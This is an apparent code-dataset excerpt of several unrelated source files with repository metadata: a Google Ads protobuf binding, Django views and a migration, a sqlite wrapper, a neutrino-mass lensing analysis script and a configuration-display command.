blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0e8424e290643259e8f4b6854ed2725343d9e5cd | 89c4a43a505df8fdf1f0d7386988c4896c2e631b | /google/ads/googleads/v8/resources/types/ad_group.py | 243d485134ef74e75b402fb5eb6187f67cf4952e | [
"Apache-2.0"
] | permissive | hurricanelennane/google-ads-python | a0a1fed690776a8bb2e81f637eb7eae10fb4992f | 310a488b6fdad9d5beea8fa4b166edce779a2511 | refs/heads/master | 2023-07-04T03:07:53.344466 | 2021-07-16T19:06:36 | 2021-07-16T19:06:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,520 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v8.common.types import custom_parameter
from google.ads.googleads.v8.common.types import (
explorer_auto_optimizer_setting as gagc_explorer_auto_optimizer_setting,
)
from google.ads.googleads.v8.common.types import (
targeting_setting as gagc_targeting_setting,
)
from google.ads.googleads.v8.enums.types import ad_group_ad_rotation_mode
from google.ads.googleads.v8.enums.types import ad_group_status
from google.ads.googleads.v8.enums.types import ad_group_type
from google.ads.googleads.v8.enums.types import asset_field_type
from google.ads.googleads.v8.enums.types import bidding_source
from google.ads.googleads.v8.enums.types import targeting_dimension
# Module-level proto-plus registration: binds the message types declared in
# this module (the "manifest") to the Google Ads proto package so they are
# marshalled/unmarshalled with the v8 wire format.
__protobuf__ = proto.module(
    package="google.ads.googleads.v8.resources",
    marshal="google.ads.googleads.v8",
    manifest={"AdGroup",},
)
class AdGroup(proto.Message):
    r"""An ad group.
    Attributes:
        resource_name (str):
            Immutable. The resource name of the ad group. Ad group
            resource names have the form:
            ``customers/{customer_id}/adGroups/{ad_group_id}``
        id (int):
            Output only. The ID of the ad group.
        name (str):
            The name of the ad group.
            This field is required and should not be empty
            when creating new ad groups.
            It must contain fewer than 255 UTF-8 full-width
            characters.
            It must not contain any null (code point 0x0),
            NL line feed (code point 0xA) or carriage return
            (code point 0xD) characters.
        status (google.ads.googleads.v8.enums.types.AdGroupStatusEnum.AdGroupStatus):
            The status of the ad group.
        type_ (google.ads.googleads.v8.enums.types.AdGroupTypeEnum.AdGroupType):
            Immutable. The type of the ad group.
        ad_rotation_mode (google.ads.googleads.v8.enums.types.AdGroupAdRotationModeEnum.AdGroupAdRotationMode):
            The ad rotation mode of the ad group.
        base_ad_group (str):
            Output only. For draft or experiment ad
            groups, this field is the resource name of the
            base ad group from which this ad group was
            created. If a draft or experiment ad group does
            not have a base ad group, then this field is
            null.
            For base ad groups, this field equals the ad
            group resource name.
            This field is read-only.
        tracking_url_template (str):
            The URL template for constructing a tracking
            URL.
        url_custom_parameters (Sequence[google.ads.googleads.v8.common.types.CustomParameter]):
            The list of mappings used to substitute custom parameter
            tags in a ``tracking_url_template``, ``final_urls``, or
            ``mobile_final_urls``.
        campaign (str):
            Immutable. The campaign to which the ad group
            belongs.
        cpc_bid_micros (int):
            The maximum CPC (cost-per-click) bid.
        cpm_bid_micros (int):
            The maximum CPM (cost-per-thousand viewable
            impressions) bid.
        target_cpa_micros (int):
            The target CPA (cost-per-acquisition).
        cpv_bid_micros (int):
            Output only. The CPV (cost-per-view) bid.
        target_cpm_micros (int):
            Average amount in micros that the advertiser
            is willing to pay for every thousand times the
            ad is shown.
        target_roas (float):
            The target ROAS (return-on-ad-spend)
            override. If the ad group's campaign bidding
            strategy is a standard Target ROAS strategy,
            then this field overrides the target ROAS
            specified in the campaign's bidding strategy.
            Otherwise, this value is ignored.
        percent_cpc_bid_micros (int):
            The percent cpc bid amount, expressed as a fraction of the
            advertised price for some good or service. The valid range
            for the fraction is [0,1) and the value stored here is
            1,000,000 \* [fraction].
        explorer_auto_optimizer_setting (google.ads.googleads.v8.common.types.ExplorerAutoOptimizerSetting):
            Settings for the Display Campaign Optimizer,
            initially termed "Explorer".
        display_custom_bid_dimension (google.ads.googleads.v8.enums.types.TargetingDimensionEnum.TargetingDimension):
            Allows advertisers to specify a targeting
            dimension on which to place absolute bids. This
            is only applicable for campaigns that target
            only the display network and not search.
        final_url_suffix (str):
            URL template for appending params to Final
            URL.
        targeting_setting (google.ads.googleads.v8.common.types.TargetingSetting):
            Setting for targeting related features.
        effective_target_cpa_micros (int):
            Output only. The effective target CPA (cost-
            er-acquisition). This field is read-only.
        effective_target_cpa_source (google.ads.googleads.v8.enums.types.BiddingSourceEnum.BiddingSource):
            Output only. Source of the effective target
            CPA. This field is read-only.
        effective_target_roas (float):
            Output only. The effective target ROAS
            (return-on-ad-spend). This field is read-only.
        effective_target_roas_source (google.ads.googleads.v8.enums.types.BiddingSourceEnum.BiddingSource):
            Output only. Source of the effective target
            ROAS. This field is read-only.
        labels (Sequence[str]):
            Output only. The resource names of labels
            attached to this ad group.
        excluded_parent_asset_field_types (Sequence[google.ads.googleads.v8.enums.types.AssetFieldTypeEnum.AssetFieldType]):
            The asset field types that should be excluded
            from this ad group. Asset links with these field
            types will not be inherited by this ad group
            from the upper levels.
    """
    # NOTE: this class is an auto-generated proto-plus binding for the Google
    # Ads API. The field numbers below are part of the wire format and must
    # stay in sync with the ad_group.proto definition -- do not edit by hand.
    resource_name = proto.Field(proto.STRING, number=1,)
    id = proto.Field(proto.INT64, number=34, optional=True,)
    name = proto.Field(proto.STRING, number=35, optional=True,)
    status = proto.Field(
        proto.ENUM,
        number=5,
        enum=ad_group_status.AdGroupStatusEnum.AdGroupStatus,
    )
    type_ = proto.Field(
        proto.ENUM, number=12, enum=ad_group_type.AdGroupTypeEnum.AdGroupType,
    )
    ad_rotation_mode = proto.Field(
        proto.ENUM,
        number=22,
        enum=ad_group_ad_rotation_mode.AdGroupAdRotationModeEnum.AdGroupAdRotationMode,
    )
    base_ad_group = proto.Field(proto.STRING, number=36, optional=True,)
    tracking_url_template = proto.Field(proto.STRING, number=37, optional=True,)
    url_custom_parameters = proto.RepeatedField(
        proto.MESSAGE, number=6, message=custom_parameter.CustomParameter,
    )
    campaign = proto.Field(proto.STRING, number=38, optional=True,)
    cpc_bid_micros = proto.Field(proto.INT64, number=39, optional=True,)
    cpm_bid_micros = proto.Field(proto.INT64, number=40, optional=True,)
    target_cpa_micros = proto.Field(proto.INT64, number=41, optional=True,)
    cpv_bid_micros = proto.Field(proto.INT64, number=42, optional=True,)
    target_cpm_micros = proto.Field(proto.INT64, number=43, optional=True,)
    target_roas = proto.Field(proto.DOUBLE, number=44, optional=True,)
    percent_cpc_bid_micros = proto.Field(proto.INT64, number=45, optional=True,)
    explorer_auto_optimizer_setting = proto.Field(
        proto.MESSAGE,
        number=21,
        message=gagc_explorer_auto_optimizer_setting.ExplorerAutoOptimizerSetting,
    )
    display_custom_bid_dimension = proto.Field(
        proto.ENUM,
        number=23,
        enum=targeting_dimension.TargetingDimensionEnum.TargetingDimension,
    )
    final_url_suffix = proto.Field(proto.STRING, number=46, optional=True,)
    targeting_setting = proto.Field(
        proto.MESSAGE,
        number=25,
        message=gagc_targeting_setting.TargetingSetting,
    )
    effective_target_cpa_micros = proto.Field(
        proto.INT64, number=47, optional=True,
    )
    effective_target_cpa_source = proto.Field(
        proto.ENUM,
        number=29,
        enum=bidding_source.BiddingSourceEnum.BiddingSource,
    )
    effective_target_roas = proto.Field(proto.DOUBLE, number=48, optional=True,)
    effective_target_roas_source = proto.Field(
        proto.ENUM,
        number=32,
        enum=bidding_source.BiddingSourceEnum.BiddingSource,
    )
    labels = proto.RepeatedField(proto.STRING, number=49,)
    excluded_parent_asset_field_types = proto.RepeatedField(
        proto.ENUM,
        number=54,
        enum=asset_field_type.AssetFieldTypeEnum.AssetFieldType,
    )
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"noreply@github.com"
] | noreply@github.com |
def solution(matrix):
    """Return True when the matrix values form one monotonic sequence.

    The matrix is read in boustrophedon ("snake") order, column by column,
    starting at the bottom-left corner: column 0 bottom-to-top, column 1
    top-to-bottom, and so on.  Equal neighbours are allowed; the first
    strict inequality fixes the direction (increasing or decreasing) and
    every later strict step must agree with it.

    Bug fixed versus the previous version: when the traversal *started*
    with a run of equal values, the direction was permanently locked to
    "neither" (code 2) and any genuinely monotonic sequence was rejected;
    the first step also compared the starting cell against matrix[-1][0]
    via Python's negative indexing.
    """
    rows = len(matrix)
    # Flatten the matrix in snake order, moving upwards from bottom-left.
    values = []
    upward = True
    for j in range(len(matrix[0])):
        column = [matrix[i][j] for i in range(rows)]
        values.extend(reversed(column) if upward else column)
        upward = not upward
    increasing = None  # unknown until the first strict inequality
    for a, b in zip(values, values[1:]):
        if a == b:
            continue  # ties never break monotonicity
        step = b > a
        if increasing is None:
            increasing = step  # first strict step fixes the direction
        elif increasing != step:
            return False
    return True
def isSequence(firstValue, secondValue):
    """Classify the step from firstValue to secondValue.

    Returns 1 when the pair increases, 0 when it decreases and 2 when the
    two values are equal (neither increasing nor decreasing).
    """
    if firstValue == secondValue:
        return 2
    return 1 if secondValue > firstValue else 0
# 5x5 row-major grid: the snake traversal (21, 16, 11, 6, 1, 2, 7, ...)
# first decreases and then increases, so this prints False.
example1 = [
    [1, 2, 3, 4, 5],
    [6, 7, 8, 9, 10],
    [11, 12, 13, 14, 15],
    [16, 17, 18, 19, 20],
    [21, 22, 23, 24, 25]]
# Single column, strictly decreasing when read bottom-up -> prints True.
example2 = [
    [1],
    [6],
    [11],
    [16],
    [21]]
# Two columns whose snake order (21, 16, 11, 6, 1, 0, -1, -2, -3, -4)
# keeps decreasing -> prints True.
example3 = [
    [1, 0],
    [6, -1],
    [11, -2],
    [16, -3],
    [21, -4]]
print(solution(example1))
print(solution(example2))
print(solution(example3))
| [
"qqq.qqq48@yandex.ru"
] | qqq.qqq48@yandex.ru |
3e428ed45a6453054fba8058c7ff3ad38de20bdc | 94c3f065abe6a1391117327efbad4f7cce0b0978 | /ecommerce_webapp/views.py | 564b16f63e228794a347891904e4e1b52c9dec9a | [] | no_license | ycv005/Ecommerce | 9c9a3a88517d33de657eb441980473b593912ca8 | 09bb27476a529d6c34274fdaf4b6ef38f6b6884b | refs/heads/master | 2022-12-23T05:11:27.428853 | 2020-08-17T12:13:59 | 2020-08-17T12:13:59 | 178,663,902 | 3 | 1 | null | 2022-12-08T09:35:49 | 2019-03-31T08:51:05 | JavaScript | UTF-8 | Python | false | false | 785 | py | from django.shortcuts import HttpResponse
from django.shortcuts import render,redirect
from django.contrib.auth import authenticate, login
from django.contrib.auth.models import User
from .models import ContactForm
def home_page(request):
    """Render the landing page with a demo context variable."""
    context = {"title": "This is from the context"}
    return render(request, "ecommerce_webapp/home_page.html", context=context)
def contact_page(request):
    """Render the contact page and validate a submitted ContactForm.

    On GET (or an invalid POST) the form is re-rendered with its errors;
    on a valid POST the cleaned data is currently only echoed to stdout.
    """
    # Bind to POST data when present; ``request.POST or None`` keeps the
    # form unbound on GET so no validation errors are shown initially.
    contact_form = ContactForm(request.POST or None)
    if contact_form.is_valid():
        # TODO: persist or e-mail the submission; printing is a dev
        # placeholder kept from the original implementation.
        print(contact_form.cleaned_data)
    return render(request, "ecommerce_webapp/contact_page.html", {"form": contact_form})
def about_page(request):
    """Render the static About page."""
    template_name = "ecommerce_webapp/about_page.html"
    return render(request, template_name, {})
"ycverma005@gmail.com"
] | ycverma005@gmail.com |
752e9f1a6a208543137c36cda179ddf64539f177 | b4a0380acd79a21c5596bfa5fac6eb337ef5359a | /build/lib.linux-x86_64-3.8/maskrcnn_benchmark/data/datasets/evaluation/kitchen/__init__.py | 262e29603168969af9a493dd19f6620fd1abb4d8 | [] | no_license | xiaofeng-c/Morphable-Detector | 781104d8a7221eb03c55a67f51f696e46ded4003 | 3e50bb20493c3e0b99d37971e51487124aa08b5b | refs/heads/master | 2023-08-27T20:53:21.606442 | 2021-10-18T22:28:38 | 2021-10-18T22:28:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | import logging
from .kitchen_eval import do_kitchen_evaluation
def kitchen_evaluation(dataset, predictions, output_folder, box_only, **_):
    """Delegate to do_kitchen_evaluation.

    The kitchen dataset evaluator supports neither ``box_only`` nor custom
    iou_types; both are ignored (with a log message) and any extra keyword
    arguments are swallowed by ``**_``.
    """
    logger = logging.getLogger("maskrcnn_benchmark.inference")
    if box_only:
        logger.warning("kitchen evaluation doesn't support box_only, ignored.")
    logger.info("performing kitchen evaluation, ignored iou_types.")
    eval_kwargs = dict(
        dataset=dataset,
        predictions=predictions,
        output_folder=output_folder,
        logger=logger,
    )
    return do_kitchen_evaluation(**eval_kwargs)
| [
"zhaoxiangyun915@gmail.com"
] | zhaoxiangyun915@gmail.com |
8873e1b784b24057a8e64655dca5dc3c4d1f3d87 | 5603625e865a7cfe415c1aae4035a890aeb23864 | /bin/mnu.py | a178061c01bb7c57e4e3d48aa0bfeed54f50e963 | [] | no_license | msyriac/peakaboo | aa3ac1396c2af0862f9c5891a20a08dddd97068b | 8bb8a50262695733b086984f7d89ff4f04187278 | refs/heads/master | 2021-01-21T13:30:31.434801 | 2018-05-16T18:53:34 | 2018-05-16T18:53:34 | 102,130,912 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,997 | py | import numpy as np
from peakaboo import liuSims as ls
import orphics.tools.io as io
import os,sys
import orphics.analysis.flatMaps as fmaps
from mpi4py import MPI
from orphics.analysis.pipeline import mpi_distribute, MPIStats
import orphics.analysis.flatMaps as fmaps
from enlib import enmap, resample
# Get MPI comm
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
numcores = comm.Get_size()
out_dir = os.environ['WWW']+"peakaboo/"
#file_root = "/gpfs01/astro/workarea/msyriac/data/sims/jia/output/jia_recon_"
file_root = lambda mass,ftype,x,ext: "/gpfs01/astro/workarea/msyriac/data/sims/jia/output/"+mass+"_"+ftype+"_experiment_simple_"+str(x).zfill(9)+"."+ext
Ntot = 500
num_each,each_tasks = mpi_distribute(Ntot,numcores)
mpibox = MPIStats(comm,num_each,tag_start=333)
my_tasks = each_tasks[rank]
LCmassless = ls.LiuConvergence(root_dir="/gpfs01/astro/workarea/msyriac/data/sims/jia/cmb/massless/",zstr="1100.00")
LCmassive = ls.LiuConvergence(root_dir="/gpfs01/astro/workarea/msyriac/data/sims/jia/cmb/massive/",zstr="1100.00")
lbin_edges = np.arange(200,3000,100)
for k,i in enumerate(my_tasks):
#massive = enmap.read_map(file_root+"massive_"+str(i).zfill(9)+".fits")
#massless = enmap.read_map(file_root+"massless_"+str(i).zfill(9)+".fits")
massive = enmap.read_map(file_root("massive","kappa_recon",i,"fits"))
massless = enmap.read_map(file_root("massless","kappa_recon",i,"fits"))
if k==0:
qpower = fmaps.QuickPower(massive.modlmap(),lbin_edges)
massive_input = LCmassive.get_kappa(i+1)
massive_input = enmap.ndmap(resample.resample_fft(massive_input,massive.shape),massive.wcs)
massless_input = LCmassless.get_kappa(i+1)
massless_input = enmap.ndmap(resample.resample_fft(massless_input,massless.shape),massless.wcs)
print massive.shape
print massive_input.shape
cents, pauto_massive = qpower.calc(massive)
cents, pauto_massless = qpower.calc(massless)
cents, pcross_massive = qpower.calc(massive,massive_input)
cents, pcross_massless = qpower.calc(massless,massless_input)
cents, pauto_massive_input = qpower.calc(massive_input)
cents, pauto_massless_input = qpower.calc(massless_input)
lcents,massive_rkk = np.loadtxt(file_root("massive","auto_n0_subbed",i,"fits"),unpack=True)
lcents,massless_rkk = np.loadtxt(file_root("massless","auto_n0_subbed",i,"fits"),unpack=True)
mpibox.add_to_stats("massiveAutoN0",massive_rkk)
mpibox.add_to_stats("masslessAutoN0",massless_rkk)
mpibox.add_to_stats("massiveAuto",pauto_massive)
mpibox.add_to_stats("masslessAuto",pauto_massless)
mpibox.add_to_stats("masslessCross",pcross_massless)
mpibox.add_to_stats("massiveCross",pcross_massive)
mpibox.add_to_stats("massiveInput",pauto_massive_input)
mpibox.add_to_stats("masslessInput",pauto_massless_input)
print rank,i
mpibox.get_stats()
if rank==0:
rm = mpibox.stats["massiveAutoN0"]
rm0 = mpibox.stats["masslessAutoN0"]
mauto = mpibox.stats["massiveAuto"]
m0auto = mpibox.stats["masslessAuto"]
m0cross = mpibox.stats["masslessCross"]
mcross = mpibox.stats["massiveCross"]
mauto_input = mpibox.stats["massiveInput"]
m0auto_input = mpibox.stats["masslessInput"]
def camb_pred(nu):
import orphics.tools.cmb as cmb
# camb_cl_prediction
cambRoot = "data/jia_"+nu
theory = cmb.loadTheorySpectraFromCAMB(cambRoot,unlensedEqualsLensed=False,useTotal=False,TCMB = 2.7255e6,lpad=9000)
ellrange = np.arange(2,3000,1)
clkk_camb = theory.gCl("kk",ellrange)
return ellrange,clkk_camb
ellrange,clkk_camb0 = camb_pred("massless")
pl = io.Plotter(scaleY='log',labelX="$\\ell$",labelY="$C_{\ell}$")
pl.addErr(lcents,rm0['mean'],yerr=rm0['errmean'],marker="o")
pl.addErr(cents,m0cross['mean'],yerr=m0cross['errmean'],marker="^")
pl.add(cents,m0auto_input['mean'],marker="x",ls="none")
pl.add(ellrange,clkk_camb0,label="cl camb",color="k")
pl._ax.set_ylim(1.e-9,1.e-6)
pl.done(out_dir+"massless.png")
ellrange,clkk_camb = camb_pred("massive")
pl = io.Plotter(scaleY='log',labelX="$\\ell$",labelY="$C_{\ell}$")
pl.addErr(lcents,rm['mean'],yerr=rm['errmean'],marker="o")
pl.addErr(cents,mcross['mean'],yerr=mcross['errmean'],marker="^")
pl.add(cents,mauto_input['mean'],marker="x",ls="none")
pl.add(ellrange,clkk_camb,label="cl camb",color="k")
pl._ax.set_ylim(1.e-9,1.e-6)
pl.done(out_dir+"massive.png")
pdiff = (clkk_camb-clkk_camb0)*100./clkk_camb0
pl = io.Plotter(labelX="$\\ell$",labelY="$100\\Delta C_{\ell}/C_{\ell}$")
pl.add(lcents,(rm['mean']-rm0['mean'])*100./rm0['mean'],marker="o",ls="none")
pl.add(cents,(mauto_input['mean']-m0auto_input['mean'])*100./m0auto_input['mean'],marker="x",ls="none")
pl.add(ellrange,pdiff,label="cl camb",color="k")
pl.hline()
#pl._ax.set_ylim(-2,1)
pl._ax.set_xlim(500,3000)
pl.done(out_dir+"mnudiff.png")
| [
"mathewsyriac@gmail.com"
] | mathewsyriac@gmail.com |
c93d95df971729dcee51ec911d73f0372fbfad09 | 77c1363118126868499354d0ead05d2815066d14 | /database.py | e9ad43c944538f9b4b0d795f73e94b4ef390f565 | [] | no_license | JDamour/iDBMS-SQLITE3 | f56f2ede1538007a773dba1f7c2ad588eb344d2e | c01c1b3e91caa6dfc720b86822060842c5005ab9 | refs/heads/master | 2021-07-09T15:50:17.857616 | 2017-10-04T15:21:43 | 2017-10-04T15:21:43 | 105,782,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | #!/usr/bin/env python3
import sqlite3
class database:
    """Minimal wrapper around a sqlite3 connection bound to a single table.

    Rows are exposed as plain dicts (via sqlite3.Row); ``col1`` acts as the
    lookup and ordering key. The column names are template placeholders
    (``col1`` .. ``coln``) meant to be adapted per schema.
    """
    def __init__(self, **kwargs):
        self.filename = kwargs.get('filename')  # opens the connection
        self.table = kwargs.get('table', 'table_name')
    def sql_do(self, sql, *params):
        """Execute an arbitrary parameterized statement and commit."""
        self._db.execute(sql, params)
        self._db.commit()
    def insert(self, row):
        """Insert one record; ``row`` maps column names to values."""
        self._db.execute(
            'insert into {} (col1, col2, col3, coln) values (?, ?, ?, ?)'.format(self._table),
            (row['col1'], row['col2'], row['col3'], row['coln']))
        self._db.commit()
    def retrieve(self, key):
        """Return the row whose col1 equals *key* as a dict.

        Raises KeyError when no such row exists (previously this crashed
        with an opaque ``TypeError`` from ``dict(None)``).
        """
        cursor = self._db.execute(
            'select * from {} where col1 = ?'.format(self._table), (key,))
        row = cursor.fetchone()
        if row is None:
            raise KeyError(key)
        return dict(row)
    def __iter__(self):
        """Yield every row (as a dict), ordered by col1."""
        cursor = self._db.execute('select * from {} order by col1'.format(self._table))
        for row in cursor:
            yield dict(row)
    @property
    def filename(self): return self._filename
    @filename.setter
    def filename(self, fn):
        # Close any previously opened connection so reassigning the
        # filename does not leak a sqlite3 handle.
        if getattr(self, '_db', None) is not None:
            self._db.close()
        self._filename = fn
        self._db = sqlite3.connect(fn)
        self._db.row_factory = sqlite3.Row  # rows behave like mappings
    @property
    def table(self): return self._table
    @table.setter
    def table(self, t): self._table = t
    @table.deleter
    def table(self): self._table = 'table_name'
    def close(self):
        """Close the connection; the instance is unusable afterwards."""
        self._db.close()
        self._db = None
        del self._filename
"mpatswenimanaj@gmail.com"
] | mpatswenimanaj@gmail.com |
30e7ee6e9613f8e3a445ca8013212c82994b3b3a | 5ba25b77a21406e5549435724b2954db1fd90298 | /app/migrations/0003_auto_20200622_2232.py | 8d6b796f2610cc56782b732d66f1b2f3ddeef8a9 | [] | no_license | CodePythonFollow/Django | 66e94673377f1b5afffa605f9cb2e1e42222efdb | 6c3ee68e7766f2225614c17f3b7dab107bb1577f | refs/heads/master | 2022-12-14T05:51:57.312005 | 2020-09-22T01:05:14 | 2020-09-22T01:05:14 | 271,512,606 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | # Generated by Django 3.0.7 on 2020-06-22 22:32
from django.db import migrations
class Migration(migrations.Migration):
    # Must run after the migration that created the misspelled model.
    dependencies = [
        ('app', '0002_grade_strudent'),
    ]
    # Renames the misspelled model "Strudent" to "Student"; Django updates
    # the database table and related references automatically.
    operations = [
        migrations.RenameModel(
            old_name='Strudent',
            new_name='Student',
        ),
    ]
| [
"code1832389863@gmail.com"
] | code1832389863@gmail.com |
70d962dc42ed35c2ff643bbf27a7867dbdb3e1b3 | 786fc7dd46ea4f14266d264ef9cf1b176fff3a62 | /venv/Lib/site-packages/df_config/management/commands/config.py | d5c4a390c0ccb12ef6b604eb702ae2908bbda2bf | [] | no_license | liaxio/StockWeb | 59bb5d9706cf71f3819435018cb87c900451697f | 8cb27be3fa808461cbd6addc58c7a9c6f3230038 | refs/heads/master | 2023-07-04T01:32:17.827892 | 2021-08-03T01:49:12 | 2021-08-03T01:49:12 | 392,148,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,324 | py | # ##############################################################################
# This file is part of df_config #
# #
# Copyright (C) 2020 Matthieu Gallet <github@19pouces.net> #
# All Rights Reserved #
# #
# You may use, distribute and modify this code under the #
# terms of the (BSD-like) CeCILL-B license. #
# #
# You should have received a copy of the CeCILL-B license with #
# this file. If not, please visit: #
# https://cecill.info/licences/Licence_CeCILL-B_V1-en.txt (English) #
# or https://cecill.info/licences/Licence_CeCILL-B_V1-fr.txt (French) #
# #
# ##############################################################################
import io
from argparse import ArgumentParser
from django.core.management import BaseCommand
from django.core.management.base import OutputWrapper
from django.core.management.color import no_style
from django.template.loader import render_to_string
from django.utils.translation import gettext as _
from df_config import __version__ as version
from df_config.config.base import merger
from df_config.utils import guess_version, remove_arguments_from_help
__author__ = "Matthieu Gallet"
from df_config.config.values_providers import (
EnvironmentConfigProvider,
IniConfigProvider,
)
class Command(BaseCommand):
    """Management command that displays the merged df_config settings.

    The current configuration can be rendered as a Python module
    (``config python``), an .ini file (``config ini``) or environment
    variables (``config env``); ``--filename`` redirects the output to a
    file and ``-v 2`` adds provenance details.
    """
    # FIX: the two fragments were previously concatenated without a
    # separator ("configuration.Can display").
    help = (
        "show the current configuration. "
        'Can display as python file ("config python") or as .ini file ("config ini"). Use -v 2 to display more info.'
    )
    requires_system_checks = False
    # Maps each "action" positional value to its help text.
    options = {
        "python": "display the current config as Python module",
        "ini": "display the current config as .ini file",
        "env": "display the current config as environment variables",
    }
    def add_arguments(self, parser: ArgumentParser):
        """Register the ``action`` choice and the optional ``--filename``."""
        parser.add_argument(
            "action",
            default="show",
            choices=self.options,
            help=",\n".join(['"%s": %s' % x for x in self.options.items()]),
        )
        parser.add_argument(
            "--filename", default=None, help="write output to this file"
        )
        # Hide Django options that are irrelevant for this command.
        remove_arguments_from_help(
            parser, {"--settings", "--traceback", "--pythonpath"}
        )
    def handle(self, *args, **options):
        """Entry point; swallows BrokenPipeError so ``config ... | head`` works."""
        try:
            self.handle_head(**options)
        except BrokenPipeError:
            pass
    def handle_head(self, **options):
        """Dispatch to the requested display method, optionally capturing
        the output into ``--filename`` instead of stdout."""
        action = options["action"]
        verbosity = options["verbosity"]
        filename = options["filename"]
        fd = None
        if filename:
            # Capture everything written to self.stdout so it can be saved;
            # disable ANSI styling for file output.
            fd = io.StringIO()
            self.stdout = OutputWrapper(fd)
            self.style = no_style()
        if action == "python":
            self.show_python_config(verbosity)
        elif action == "ini":
            self.show_ini_config(verbosity)
        elif action == "env":
            self.show_env_config(verbosity)
        # FIX: the condition used to be `filename and action in {"python",
        # "env"}`, so "config ini --filename X" captured its output into the
        # StringIO above and then silently discarded it. Every action writes
        # through self.stdout, so the capture must be flushed for all of them.
        if filename:
            content = fd.getvalue()
            # noinspection PyBroadException
            if action == "python":
                try:
                    # Pretty-print with black when it is installed; purely
                    # best-effort, any failure keeps the unformatted content.
                    # noinspection PyPackageRequirements,PyUnresolvedReferences
                    import black
                    mode = black.FileMode()
                    # noinspection PyArgumentList
                    content = black.format_file_contents(content, fast=False, mode=mode)
                except Exception:
                    pass
            with open(filename, "w") as dst_fd:
                dst_fd.write(content)
    def show_external_config(self, config):
        """Render a settings-aware template and write it to stdout."""
        content = render_to_string(config, merger.settings)
        self.stdout.write(content)
    def show_ini_config(self, verbosity):
        """Display the merged configuration as an .ini document."""
        if verbosity >= 2:
            self.stdout.write(self.style.SUCCESS("# read configuration files:"))
        for provider in merger.providers:
            if not isinstance(provider, IniConfigProvider):
                continue
            elif provider.is_valid():
                self.stdout.write(
                    self.style.SUCCESS(' # - %s "%s"' % (provider.name, provider))
                )
            elif verbosity >= 2:
                self.stdout.write(
                    self.style.ERROR(
                        ' # - %s "%s" (not found)' % (provider.name, provider)
                    )
                )
        # Serialize the merged settings through a fresh ini provider.
        provider = IniConfigProvider()
        merger.write_provider(provider, include_doc=verbosity >= 2)
        self.stdout.write(provider.to_str())
    def show_env_config(self, verbosity):
        """Display the merged configuration as environment variables."""
        prefix = None
        for provider in merger.providers:
            if not isinstance(provider, EnvironmentConfigProvider):
                continue
            prefix = provider.prefix
        if not prefix:
            # FIX: the trailing character was a mojibake bullet ("used•").
            self.stderr.write("Environment variables are not used.")
            return
        if verbosity >= 2:
            self.stdout.write(self.style.SUCCESS("# read environment variables:"))
        provider = EnvironmentConfigProvider(prefix)
        merger.write_provider(provider, include_doc=verbosity >= 2)
        self.stdout.write(provider.to_str())
    def show_python_config(self, verbosity):
        """Display the merged configuration as an importable Python module."""
        self.stdout.write(self.style.SUCCESS("# " + "-" * 80))
        self.stdout.write(
            self.style.SUCCESS(
                _("# df_config version %(version)s") % {"version": version}
            )
        )
        self.stdout.write(
            self.style.SUCCESS(
                _("# %(project)s version %(version)s")
                % {
                    "version": guess_version(merger.settings),
                    "project": merger.settings["DF_PROJECT_NAME"],
                }
            )
        )
        self.stdout.write(self.style.SUCCESS("# Configuration providers:"))
        for provider in merger.providers:
            if provider.is_valid():
                self.stdout.write(
                    self.style.SUCCESS('# - %s "%s"' % (provider.name, provider))
                )
            elif verbosity > 1:
                self.stdout.write(
                    self.style.ERROR(
                        '# - %s "%s" (not found)' % (provider.name, provider)
                    )
                )
        self.stdout.write(self.style.SUCCESS("# " + "-" * 80))
        setting_names = list(merger.raw_settings)
        setting_names.sort()
        # first, compute all imports to do so the emitted module is runnable
        imports = {}
        def add_import(val):
            # Record the module of every non-builtin value (or type) used.
            if not isinstance(val, type):
                val = val.__class__
            if val.__module__ != "builtins":
                imports.setdefault(val.__module__, set()).add(val.__name__)
        for setting_name in setting_names:
            if setting_name not in merger.settings:
                continue
            value = merger.settings[setting_name]
            add_import(value)
        if imports:
            self.stdout.write("\n")
            for module_name in sorted(imports):
                objects = ", ".join(sorted(imports[module_name]))
                self.stdout.write(
                    self.style.WARNING("from %s import %s" % (module_name, objects))
                )
            self.stdout.write("\n")
        # Then emit one "NAME = repr(value)" line per setting, with the raw
        # per-provider values as comments at verbosity >= 2.
        for setting_name in setting_names:
            if setting_name not in merger.settings:
                continue
            value = merger.settings[setting_name]
            self.stdout.write(self.style.SUCCESS("%s = %r" % (setting_name, value)))
            if verbosity <= 1:
                continue
            for provider_name, raw_value in merger.raw_settings[setting_name].items():
                self.stdout.write(
                    self.style.WARNING(
                        " # %s -> %r" % (provider_name or "built-in", raw_value)
                    )
                )
| [
"sanjidafirdaws@gmail.com"
